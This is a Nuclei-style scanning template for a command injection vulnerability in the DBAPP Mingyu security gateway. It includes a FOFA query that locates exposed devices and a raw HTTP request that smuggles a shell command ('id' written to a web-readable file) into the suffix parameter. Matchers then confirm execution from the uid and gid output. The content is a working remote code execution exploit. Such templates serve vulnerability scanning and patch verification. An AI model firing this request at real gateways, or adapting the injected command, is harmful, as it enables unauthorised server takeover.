id: dbapp-mingyu-aaa-portal-auth-local-submit-rce

info:
  name: dbapp-mingyu-aaa-portal-auth-local-submit-rce
  author: hufei
  severity: critical
  description: |
    安恒 明御安全网关 aaa_portal_auth_local_submit 存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限
  reference:
    https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%AE%89%E6%81%92/%E5%AE%89%E6%81%92%20%E6%98%8E%E5%BE%A1%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20aaa_portal_auth_local_submit%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  metadata:
    max-request: 3
    fofa-query: body="/webui/images/basic/login/" && title=="明御安全网关"
    hunter-query:
    verified: true
  tags: 2023,rce,mingyu

variables:
  str1: '{{rand_base(6)}}'
  str2: '{{rand_base(6)}}'

http:
  - raw:
      - |
        GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&suffix={{urlenc(`id+>/usr/local/webui/test.txt`)\}\} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
        Connection: close
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

      - |
        GET /test.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains(body_1, "success")'
          - 'contains(body_2, "uid=")'
          - 'contains(body_2, "gid=")'
          - 'contains(body_2, "groups=")'
        condition: and